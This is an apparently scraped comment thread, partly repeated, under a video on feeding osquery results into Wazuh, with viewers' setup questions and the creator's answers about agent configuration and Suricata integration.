What could be causing nothing in wazuh to be showing up in the dashboard like yours does. I followed the video and cant seem to get any events in wazuh
Might I ask if I can put the osquery.conf into /var/ossec/etc/shared/ so that, for example in Windows, I can pull the conf file back at C:\Program Files (x86)\ossec-agent\shared\osquery.conf? Is it one way to do the remote deployment for osquery?
Hey Jason, unfortunately no. The /var/ossec/etc/shared directory contains parameters that also belong in the ossec.conf. This allows you to setup log collection, FIM directories, wodle modules, etc. and apply these settings to all wazuh agents in the group. To mass deploy the osquery.conf you could use Ansible, Chef or another remote deployment tool of your choice. Hope that helps and thanks for watching!
Little bit off topic here.. Wondering if there is a network flow(not cisco's netflow) tool that can be installed in a home lab setting and then integrated into Wazuh?
Hey Tom, Are you interested in monitoring network traffic, with something like an IDS/IPS device? If so, I really enjoy an Open Source tool called, Suricata. It can be set inline or receive packets via a span port. These results detail network flows as well as any network related events such as traffic to a command and control server, web application attacks, IP reputation and more. This tool integrates very well with Wazuh and ELK. I plan on covering Suricata and integrating it with Wazuh in future videos, but feel free to explore on your own! suricata.readthedocs.io/en/latest/what-is-suricata.html Thanks for watching!
@@taylorwalton_socfortress Thanks, yes I've been looking into Suricata. I'm struggling with aggregating the bytes sent and received, so essentially the sum of the below: data.flow.bytes_toclient data.flow.bytes_toserver It appears that these are strings and thus don't show under "Significant Terms" when "Sum" is selected within visualizations thus I'm not able to see the total or bytes sent and received between 2 IP addresses. I'm now wondering how to use Jupyter-Notebook to do this, but I think that's a big stretch. Anyhow, will wait for your video on Suricata in future, thanks for making this content - I really enjoy it!
Hi, i have fleet server to manage all agent osquery, and file: osquery_result of all server locate at fleet server, how do i add log osquery_result to wazuh . Thanks
If the osquery_result is being json outputted, install a wazuh_agent onto the fleet server and edit the ossec.conf file to contain this block /path/to/osquery_result json Hope that helps and thanks for watching!
W0706 18:03:09.135244 2388 options.cpp:106] The CLI only flag --logger_plugin set via config file will be ignored, please use a flagfile or pass it to the process at startup im facing this login on my custom query but packs works fine
Great vid - helps me understand where to place osquery as Wazuh isn't that clear on that.
Hi Taylor. Great video. Did you install osquery in your server or agent device? Forgive the question.
What could be causing nothing in wazuh to be showing up in the dashboard like yours does. I followed the video and cant seem to get any events in wazuh
Might I ask if I can put the osquery.conf into /var/ossec/etc/shared/ so that, for example in Windows, I can pull the conf file back at C:\Program Files (x86)\ossec-agent\shared\osquery.conf? Is it one way to do the remote deployment for osquery?
Hey Jason, unfortunately no. The /var/ossec/etc/shared directory contains parameters that also belong in the ossec.conf. This allows you to setup log collection, FIM directories, wodle modules, etc. and apply these settings to all wazuh agents in the group. To mass deploy the osquery.conf you could use Ansible, Chef or another remote deployment tool of your choice. Hope that helps and thanks for watching!
Hi, thanks for all. I have a request, can i have your config and flag files? i want deploy on windows and i have some problem with these files
Little bit off topic here..
Wondering if there is a network flow(not cisco's netflow) tool that can be installed in a home lab setting and then integrated into Wazuh?
Hey Tom,
Are you interested in monitoring network traffic, with something like an IDS/IPS device? If so, I really enjoy an Open Source tool called, Suricata. It can be set inline or receive packets via a span port. These results detail network flows as well as any network related events such as traffic to a command and control server, web application attacks, IP reputation and more. This tool integrates very well with Wazuh and ELK.
I plan on covering Suricata and integrating it with Wazuh in future videos, but feel free to explore on your own! suricata.readthedocs.io/en/latest/what-is-suricata.html
Thanks for watching!
@@taylorwalton_socfortress
Thanks, yes I've been looking into Suricata. I'm struggling with aggregating the bytes sent and received, so essentially the sum of the below:
data.flow.bytes_toclient
data.flow.bytes_toserver
It appears that these are strings and thus don't show under "Significant Terms" when "Sum" is selected within visualizations thus I'm not able to see the total or bytes sent and received between 2 IP addresses. I'm now wondering how to use Jupyter-Notebook to do this, but I think that's a big stretch.
Anyhow, will wait for your video on Suricata in future, thanks for making this content - I really enjoy it!
Hi, i have fleet server to manage all agent osquery, and file: osquery_result of all server locate at fleet server, how do i add log osquery_result to wazuh . Thanks
If the osquery_result is being json outputted, install a wazuh_agent onto the fleet server and edit the ossec.conf file to contain this block
/path/to/osquery_result
json
Hope that helps and thanks for watching!
@@taylorwalton_socfortress but how know the format ?
Automated installation of osquery would be more interesting...
W0706 18:03:09.135244 2388 options.cpp:106] The CLI only flag --logger_plugin set via config file will be ignored, please use a flagfile or pass it to the process at startup im facing this login on my custom query but packs works fine